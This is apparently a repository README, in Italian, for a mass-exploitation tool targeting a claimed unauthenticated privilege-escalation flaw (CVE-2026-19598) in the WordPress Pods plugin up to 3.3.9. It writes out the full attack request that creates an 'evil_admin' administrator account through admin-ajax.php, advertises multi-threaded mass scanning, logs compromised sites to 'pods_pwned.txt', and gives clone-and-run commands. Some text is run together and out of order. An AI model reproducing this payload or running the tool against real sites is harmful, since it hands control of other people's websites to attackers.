
Sfrutta la CVE-2026-19598 nel plugin WordPress Pods per creare account amministratore o sovrascrivere password tramite una richiesta AJAX non autenticata, con supporto per scansione di massa e multi-threading.
Escalatione Critica dei Privilegi Non Autenticata (CVSS 9.8) — Plugin Pods per WordPress ≤ 3.3.9
Questo strumento sfrutta CVE-2026-19598, una vulnerabilità nel plugin Pods per WordPress che consente ad attaccanti non autenticati di creare nuovi account amministratore o sovrascrivere le password degli utenti esistenti tramite l'endpoint admin-ajax.php.
| Proprietà | Valore |
|---|---|
| ID CVE | CVE-2026-19598 |
| Punteggio CVSS | 9.8 (Critico) |
| CWE | CWE-284 — Controllo degli Accessi Improprio |
| Prodotto Interessato | Plugin Pods per WordPress ≤ 3.3.9 |
| Versione Corretta | 3.3.9.1 |
| Autenticazione Richiesta | NO (non autenticata) |
| Stato | Sfruttamento Attivo |
La vulnerabilità risiede nell'azione AJAX pods_admin. A causa di controlli dei permessi impropri, il metodo save_user può essere chiamato senza autenticazione quando è presente il parametro meta-box-loader. Ciò consente a un attaccante di:
POST /wp-admin/admin-ajax.php action=pods_admin method=save_user meta-box-loader=1 user_login=evil_admin user_pass=Hacked123! role=administrator
Il plugin non verifica che l'utente che effettua la richiesta disponga delle capacità adeguate e il parametro meta-box-loader bypassa i controlli di sicurezza previsti.
pods_pwned.txt con tutti i bersagli sfruttatirequests# Clona il repository
git clone https://github.com/0xCyp1337/CVE-2026-19598.git
cd CVE-2026-19598
python3 CVE-2026-19598.py
# Installa le dipendenze (serve solo requests)
pip install requests